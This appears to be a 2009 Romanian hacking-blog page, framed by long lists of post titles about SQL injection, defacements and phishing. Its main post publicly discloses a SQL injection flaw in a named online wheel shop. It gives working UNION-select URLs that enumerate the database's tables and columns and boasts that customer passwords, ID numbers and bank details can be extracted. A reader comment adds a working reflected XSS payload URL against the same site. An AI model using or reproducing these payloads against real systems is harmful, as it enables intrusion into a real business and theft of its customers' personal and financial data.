- Hacker Uses XSS and Google Street View Data to Determine Physical Location
- CAnCAn te iubim, CA CA tine nu gasim. Superfete.cancan.ro e de rahat
- Deface (?!?) pe Cotidianul.ro
- Virusi in clipuri video [how to]
- Cyber-Bullying – palma parinteasca a noului mileniu
- Christopher “moot” Poole: The case for anonymity online
- Wtf Avira?
- Some old story about tagged.com
- Pwning cam girls for fun
- Tabloshit
- Yahoo! again - XSS in Uncategorized (357 Visits)
- Yahoo! again - bad settings? in Uncategorized (252 Visits)
- Fanii nostri in Uncategorized (183 Visits)
- Frustrant in Uncategorized (146 Visits)
- La multi ani România, la multi ani românilor in Uncategorized (137 Visits)
- Weblog.ro - Shell via Local File Inclusion in Uncategorized (119 Visits)
- Yahoo! epic fail - permanent xss unleashed in Uncategorized (50 Visits)
- ... in Uncategorized (38 Visits)
- XSS Ownage - hi5 vs. Yahoo! + video in Uncategorized (2 Visits)
- Ce nu se invata la scoala - Tipuri si tehnici spam/Hi5 (4) in Uncategorized (2 Visits)
- Hackersblog.org is now blog.rstcenter.com in (1800 Visits)
- O mica dar importanta precizare in (1402 Visits)
- Twitter in (846 Visits)
- This is the end in (834 Visits)
- Ce servicii de mail folositi? in (826 Visits)
- Un nou membru in (771 Visits)
- La multi ani România, la multi ani românilor in (762 Visits)
- Inca o pierdere de timp in (709 Visits)
- De reţinut in (670 Visits)
- Azi este ziua userilor hackersblog.org in (644 Visits)
- Hi5.com coders read this in (620 Visits)
- SMS scam (1) in (610 Visits)
- Dezinformare sau proasta informare? in (597 Visits)
- Phishing Raiffeisen cu atasament html in (557 Visits)
- Phishing Bancpost in (524 Visits)
- Si tentativele de phishing pot fi amuzante in (456 Visits)
- Ce nu se invata la scoala - Tipuri si tehnici spam/mail (2) in (2867 Visits)
- Ce nu se invata la scoala - Tipuri si tehnici spam/Hi5 (4) in (2833 Visits)
- Despre CSRF, hi5.com, cum sa trisezi la concursuri s.a.m.d. in (1206 Visits)
- [Utilitare] Suna gratis de pe internet sau de pe iPhone in (1187 Visits)
- Ce nu se invata la scoala - (D)DOS (5) in (1006 Visits)
- Virusi in clipuri video [how to] in (967 Visits)
- Ce nu se invata la scoala - Tipuri si tehnici spam (1) in (763 Visits)
- Yahoo! redirects - a big issue (with video) in (609 Visits)
- Internet vs. privacy (1) in (503 Visits)
- Ca musca in... in (462 Visits)
- RedTube.com ... The Free Sex Video Community in (13512 Visits)
- usa.kaspersky.com hacked ... full database acces , sql injection in (5411 Visits)
- libertatea.ro vulnerabil la (blind) sql injection in (3080 Visits)
- Telegraph.co.uk hacked, sql injection in (2700 Visits)
- Pwning cam girls for fun in (2693 Visits)
- Facebook hacked - sql injection in (2577 Visits)
- Simpatie.ro, matrimoniale3x.ro, apetisant.ro, deliciu.ro , etc Sql injection in (2552 Visits)
- F-Secure.com - SQL Injection + Cross Site Scripting in (1857 Visits)
- [Hacked]Bitdefender (Portugal) exposes sensitive customer data in (1853 Visits)
- Wtf Avira? in (1801 Visits)
- Christopher "moot" Poole: The case for anonymity online in (1578 Visits)
- Digital Photocopiers Loaded With Secrets in (1491 Visits)
- Hacker Uses XSS and Google Street View Data to Determine Physical Location in (891 Visits)
- Wannabe Hackers [1] - Cum sa hack-uiesti RapidShare-ul in (648 Visits)
- Wannabe Hackers [2] - cum sa faci un virus by sppy_hacker in (631 Visits)
- Hope 2603 – Kevin Mitnick - Life a Computer Hacker – Revealed in (487 Visits)
- PRIVACY IS DEAD - GET OVER IT, Pt 01-34 (Recommended by Hackersblog ) in (419 Visits)
- Oldies but goodies - Freedom Downtime - The Story of Kevin Mitnick in (415 Visits)
- [Video] The History Of Hacking in (395 Visits)
- Email Security - Why You Should Encrypt Your Email - Part One in (388 Visits)
- Deface - tuttoaffari.lastampa.it si citymusiclab.city.corriere.it in (3545 Visits)
- RNS vs. RAI - citizenreport.rai.it hacked. in (3360 Visits)
- Hi5 email finder si sfarsitul a tot ceea ce inseamna privacy in social networking in (3280 Visits)
- Se poate sparge parola de Yahoo? in (2735 Visits)
- Planete-plus-intelligente.lemonde.fr defaced by R.N.S. in (2560 Visits)
- Free SMS time, TrimiteSMS.ro in (2532 Visits)
- Gmail uber hacking in (2473 Visits)
- Cancan.ro spart pentru a doua oara intr-o zi in (2344 Visits)
- Camera de supraveghere a universitatii Alexandru Ioan Cuza din Iasi in (2322 Visits)
- Stiri cu antena3 in (2241 Visits)
Posted on January 26th, 2009
Vulnerabilitate raportata de daemien:
Site URL: http://www.shop-jante.ro
DB Name:cardesign_new
Versiune database: 5.0.22
————–
La prima vedere pare un site banal, un simplu shop de jante aliaj [ce-i drept numai marci high-end]. Pacat de numarul mare de clienti [persoane fizice cat si juridice] care nu stiu la ce riscuri se expun atunci cand se inregistreaza pe acest site, evident slab securizat!
Se pot extrage cu usurinta informatii din baza de date precum: username, parola, email, nume, prenume, adresa, serie BI, CNP, telefon, cont, banca etc…
Pretty fucked up.. huh?!
))))))))
————–
Tabele:
http://www.shop-jante.ro/search.php?id=2+and+1=0+union+select+1,2,table_name,4%20from%20information_schema.tables–
Coloane:
http://www.shop-jante.ro/search.php?id=2+and+1=0+union+select+1,2,column_name,4%20from%20information_schema.columns–
Multumim daemien



January 26th, 2009 at 8:10 pm
“Pacat de numarul mare de clienti”
Intradevar…
In afara subiectului: 2fingers poti uploada pozele pe http://tinypic.com … ma deranjeaza pop-up-urile de la imageshack.
Mersi
January 27th, 2009 at 12:23 am
Imi cer scuze ca am uitat sa precizez in mail si vulnerabilitatea de tip XSS, asadar .. tadadadaaaaammmmm:
http://shop-jante.ro/filterByCar.php?marcaMasina=46&anul=2003&model=%22%3E%3Cscript%3Ealert(/daemien@sysboard.net/)%3C/script%3E&diameter=8.5×20